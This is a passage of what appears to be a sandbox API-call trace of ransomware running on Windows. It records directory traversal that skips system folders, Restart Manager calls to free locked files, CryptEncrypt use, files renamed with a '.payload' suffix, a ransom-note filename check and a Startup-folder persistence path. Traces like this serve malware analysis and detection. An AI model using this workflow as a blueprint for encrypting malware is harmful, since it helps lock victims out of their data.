lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342fa74*=0x3a6, lpOverlapped=0x0) returned 1 [0064.307] CloseHandle (hObject=0x424) returned 1 [0064.308] GetProcessHeap () returned 0x5e0000 [0064.308] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x624df8 | out: hHeap=0x5e0000) returned 1 [0064.308] FindNextFileW (in: hFindFile=0x607020, lpFindFileData=0x342fd30 | out: lpFindFileData=0x342fd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0064.308] lstrcmpiW (lpString1="Boot", lpString2="Windows") returned -1 [0064.308] lstrcmpiW (lpString1="Boot", lpString2="$Recycle.bin") returned 1 [0064.308] lstrcmpiW (lpString1="Boot", lpString2="System Volume Information") returned -1 [0064.308] lstrcmpiW (lpString1="Boot", lpString2="Program Files") returned -1 [0064.308] lstrcmpiW (lpString1="Boot", lpString2="Program Files (x86)") returned -1 [0064.308] wnsprintfW (in: pszDest=0x6288d8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot") returned 11 [0064.308] lstrcmpW (lpString1="Boot", lpString2=".") returned 1 [0064.308] lstrcmpW (lpString1="Boot", lpString2="..") returned 1 [0064.308] lstrcmpW (lpString1="\\\\?\\C:\\Boot", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0064.308] GetProcessHeap () returned 0x5e0000 [0064.308] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x624df8 [0064.308] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\*") returned 13 [0064.308] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\*", lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9d311c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef9d311c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606be0 [0064.342] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.342] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.342] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.342] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.342] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.342] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\.") returned 13 [0064.342] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.342] StrStrIW (lpFirst=".", lpSrch=".payload") returned 0x0 [0064.342] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0064.342] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0064.342] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0064.342] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\." (normalized: "c:\\boot\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.342] UuidCreate (in: Uuid=0x342f96c | out: Uuid=0x342f96c) returned 0x0 [0064.342] UuidToStringW (in: Uuid=0x342f96c, StringUuid=0x342f984 | out: StringUuid=0x342f984) returned 0x0 [0064.342] RmStartSession () returned 0x0 [0064.345] RmRegisterResources () returned 0x0 [0064.351] RmGetList () returned 0x6 [0064.414] RmEndSession () returned 0x0 [0064.481] RpcStringFreeW (in: String=0x342f984 | out: String=0x342f984) returned 0x0 [0064.481] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9d311c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef9d311c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0064.482] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.482] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.482] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.482] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.482] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.482] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\..") returned 14 [0064.482] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.482] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.482] StrStrIW (lpFirst="..", lpSrch=".payload") returned 0x0 [0064.482] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0064.482] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0064.482] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0064.482] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\.." (normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.482] UuidCreate (in: Uuid=0x342f96c | out: Uuid=0x342f96c) returned 0x0 [0064.482] UuidToStringW (in: Uuid=0x342f96c, StringUuid=0x342f984 | out: StringUuid=0x342f984) returned 0x0 [0064.482] RmStartSession () returned 0x0 [0064.484] RmRegisterResources () returned 0x0 [0064.489] RmGetList () returned 0x6 [0064.535] RmEndSession () returned 0x0 [0064.608] RpcStringFreeW (in: String=0x342f984 | out: String=0x342f984) returned 0x0 [0064.608] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xac3efa99, ftLastAccessTime.dwHighDateTime=0x1d4d5d3, ftLastWriteTime.dwLowDateTime=0xac3efa99, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="BCD", cAlternateFileName="")) returned 1 [0064.608] lstrcmpiW (lpString1="BCD", lpString2="Windows") returned -1 [0064.608] lstrcmpiW (lpString1="BCD", lpString2="$Recycle.bin") returned 1 [0064.608] lstrcmpiW (lpString1="BCD", lpString2="System Volume Information") returned -1 [0064.608] lstrcmpiW (lpString1="BCD", lpString2="Program Files") returned -1 [0064.608] lstrcmpiW (lpString1="BCD", lpString2="Program Files (x86)") returned -1 [0064.608] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD") returned 15 [0064.608] StrStrIW (lpFirst="BCD", lpSrch=".payload") returned 0x0 [0064.608] lstrcmpW (lpString1="BCD", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.608] lstrcmpW (lpString1="BCD", lpString2="taridd") returned -1 [0064.608] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\BCD", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0064.608] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.609] UuidCreate (in: Uuid=0x342f96c | out: Uuid=0x342f96c) returned 0x0 [0064.609] UuidToStringW (in: Uuid=0x342f96c, StringUuid=0x342f984 | out: StringUuid=0x342f984) returned 0x0 [0064.609] RmStartSession () returned 0x0 [0064.611] RmRegisterResources () returned 0x0 [0064.615] RmGetList () returned 0xea [0064.815] GetProcessHeap () returned 0x5e0000 [0064.815] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x29c) returned 0x645008 [0064.815] RmGetList () returned 0x0 [0064.992] GetCurrentProcessId () returned 0xcac [0064.992] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0064.992] GetProcessHeap () returned 0x5e0000 [0064.992] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x645008 | out: hHeap=0x5e0000) returned 1 [0064.992] RmEndSession () returned 0x0 [0065.150] RpcStringFreeW (in: String=0x342f984 | out: String=0x342f984) returned 0x0 [0065.151] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.151] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0065.151] lstrcmpiW (lpString1="BCD.LOG", lpString2="Windows") returned -1 [0065.151] lstrcmpiW (lpString1="BCD.LOG", lpString2="$Recycle.bin") returned 1 [0065.151] lstrcmpiW (lpString1="BCD.LOG", lpString2="System Volume Information") returned -1 [0065.151] lstrcmpiW (lpString1="BCD.LOG", lpString2="Program Files") returned -1 [0065.151] lstrcmpiW (lpString1="BCD.LOG", lpString2="Program Files (x86)") returned -1 [0065.151] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG") returned 19 [0065.151] StrStrIW (lpFirst="BCD.LOG", lpSrch=".payload") returned 0x0 [0065.151] lstrcmpW (lpString1="BCD.LOG", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.151] lstrcmpW (lpString1="BCD.LOG", lpString2="taridd") returned -1 [0065.151] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\BCD.LOG", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0065.151] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.151] UuidCreate (in: Uuid=0x342f96c | out: Uuid=0x342f96c) returned 0x0 [0065.151] UuidToStringW (in: Uuid=0x342f96c, StringUuid=0x342f984 | out: StringUuid=0x342f984) returned 0x0 [0065.151] RmStartSession () returned 0x0 [0065.153] RmRegisterResources () returned 0x0 [0065.158] RmGetList () returned 0xea [0065.286] GetProcessHeap () returned 0x5e0000 [0065.286] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x29c) returned 0x645a58 [0065.286] RmGetList () returned 0x0 [0065.489] GetCurrentProcessId () returned 0xcac [0065.489] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0065.489] GetProcessHeap () returned 0x5e0000 [0065.489] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x645a58 | out: hHeap=0x5e0000) returned 1 [0065.489] RmEndSession () returned 0x0 [0065.562] RpcStringFreeW (in: String=0x342f984 | out: String=0x342f984) returned 0x0 [0065.562] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.562] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0065.562] lstrcmpiW (lpString1="BCD.LOG1", lpString2="Windows") returned -1 [0065.562] lstrcmpiW (lpString1="BCD.LOG1", lpString2="$Recycle.bin") returned 1 [0065.562] lstrcmpiW (lpString1="BCD.LOG1", lpString2="System Volume Information") returned -1 [0065.562] lstrcmpiW (lpString1="BCD.LOG1", lpString2="Program Files") returned -1 [0065.562] lstrcmpiW (lpString1="BCD.LOG1", lpString2="Program Files (x86)") returned -1 [0065.563] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG1") returned 20 [0065.563] StrStrIW (lpFirst="BCD.LOG1", lpSrch=".payload") returned 0x0 [0065.563] lstrcmpW (lpString1="BCD.LOG1", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.563] lstrcmpW (lpString1="BCD.LOG1", lpString2="taridd") returned -1 [0065.563] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\BCD.LOG1", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0065.563] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0065.563] GetTickCount () returned 0x1150c9f [0065.563] GetTickCount () returned 0x1150c9f [0065.563] GetTickCount () returned 0x1150c9f [0065.563] GetTickCount () returned 0x1150c9f [0065.563] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0065.563] GetProcessHeap () returned 0x5e0000 [0065.563] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0065.563] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x0, lpOverlapped=0x0) returned 1 [0065.564] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.564] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x0, lpOverlapped=0x0) returned 1 [0065.564] GetProcessHeap () returned 0x5e0000 [0065.564] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0065.564] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.564] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0065.565] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0065.565] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0065.565] CloseHandle (hObject=0x430) returned 1 [0065.566] GetProcessHeap () returned 0x5e0000 [0065.566] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60ec60 [0065.566] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG1_r00t_{nhhHyu}.payload") returned 42 [0065.566] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), lpNewFileName="\\\\?\\C:\\Boot\\BCD.LOG1_r00t_{nhhHyu}.payload" (normalized: "c:\\boot\\bcd.log1_r00t_{nhhhyu}.payload")) returned 1 [0065.566] GetProcessHeap () returned 0x5e0000 [0065.566] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60ec60 | out: hHeap=0x5e0000) returned 1 [0065.566] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0065.567] lstrcmpiW (lpString1="BCD.LOG2", lpString2="Windows") returned -1 [0065.567] lstrcmpiW (lpString1="BCD.LOG2", lpString2="$Recycle.bin") returned 1 [0065.567] lstrcmpiW (lpString1="BCD.LOG2", lpString2="System Volume Information") returned -1 [0065.567] lstrcmpiW (lpString1="BCD.LOG2", lpString2="Program Files") returned -1 [0065.567] lstrcmpiW (lpString1="BCD.LOG2", lpString2="Program Files (x86)") returned -1 [0065.567] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG2") returned 20 [0065.567] StrStrIW (lpFirst="BCD.LOG2", lpSrch=".payload") returned 0x0 [0065.567] lstrcmpW (lpString1="BCD.LOG2", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.567] lstrcmpW (lpString1="BCD.LOG2", lpString2="taridd") returned -1 [0065.567] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\BCD.LOG2", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0065.567] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0065.567] GetTickCount () returned 0x1150c9f [0065.567] GetTickCount () returned 0x1150c9f [0065.567] GetTickCount () returned 0x1150c9f [0065.567] GetTickCount () returned 0x1150c9f [0065.567] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0065.567] GetProcessHeap () returned 0x5e0000 [0065.567] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0065.567] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x0, lpOverlapped=0x0) returned 1 [0065.567] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.568] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x0, lpOverlapped=0x0) returned 1 [0065.568] GetProcessHeap () returned 0x5e0000 [0065.568] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0065.568] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.568] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0065.569] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0065.569] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0065.569] CloseHandle (hObject=0x430) returned 1 [0065.569] GetProcessHeap () returned 0x5e0000 [0065.569] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60ec60 [0065.569] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG2_r00t_{nhhHyu}.payload") returned 42 [0065.570] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), lpNewFileName="\\\\?\\C:\\Boot\\BCD.LOG2_r00t_{nhhHyu}.payload" (normalized: "c:\\boot\\bcd.log2_r00t_{nhhhyu}.payload")) returned 1 [0065.570] GetProcessHeap () returned 0x5e0000 [0065.570] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60ec60 | out: hHeap=0x5e0000) returned 1 [0065.570] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0065.570] lstrcmpiW (lpString1="bg-BG", lpString2="Windows") returned -1 [0065.570] lstrcmpiW (lpString1="bg-BG", lpString2="$Recycle.bin") returned 1 [0065.570] lstrcmpiW (lpString1="bg-BG", lpString2="System Volume Information") returned -1 [0065.570] lstrcmpiW (lpString1="bg-BG", lpString2="Program Files") returned -1 [0065.570] lstrcmpiW (lpString1="bg-BG", lpString2="Program Files (x86)") returned -1 [0065.570] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\bg-BG") returned 17 [0065.570] lstrcmpW (lpString1="bg-BG", lpString2=".") returned 1 [0065.570] lstrcmpW (lpString1="bg-BG", lpString2="..") returned 1 [0065.570] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\bg-BG", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.570] GetProcessHeap () returned 0x5e0000 [0065.570] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60ec60 [0065.570] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\bg-BG\\*") returned 19 [0065.570] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\bg-BG\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x6061e0 [0065.571] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.571] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.571] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.571] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.571] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.571] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\bg-BG\\.") returned 19 [0065.571] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.571] FindNextFileW (in: hFindFile=0x6061e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.571] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.571] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.571] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.571] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.571] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.571] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\bg-BG\\..") returned 20 [0065.571] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.571] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.571] 